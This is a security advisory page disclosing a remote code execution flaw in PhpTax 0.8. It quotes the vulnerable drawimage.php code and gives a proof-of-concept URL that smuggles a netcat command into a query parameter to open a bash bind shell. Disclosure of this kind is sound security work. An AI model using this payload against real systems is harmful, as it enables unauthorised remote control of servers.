PhpTax 0.8 Remote Code Execution

2012.10.03
Credit: Jean Pascal Pereira
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

----------------------------------------------------- phptax 0.8 <= Remote Code Execution Vulnerability ----------------------------------------------------- Discovered by: Jean Pascal Pereira <pereira@secbiz.de> Vendor information: "PhpTax is free software to do your U.S. income taxes. Tested under Unix environment. The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot." Vendor URI: http://sourceforge.net/projects/phptax/ ---------------------------------------------------- Risk-level: High The application is prone to a remote code execution vulnerability. ---------------------------------------------------- drawimage.php, line 63: include ("./files/$_GET[pfilez]"); // makes a png image $pfilef=str_replace(".tob",".png",$_GET[pfilez]); $pfilep=str_replace(".tob",".pdf",$_GET[pfilez]); Header("Content-type: image/png"); if ($_GET[pdf] == "") Imagepng($image); if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef"); if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep"); ---------------------------------------------------- Exploit / Proof of Concept: Bindshell on port 23235 using netcat: http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make ---------------------------------------------------- Solution: Do some input validation. ----------------------------------------------------

References:

http://sourceforge.net/projects/phptax/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top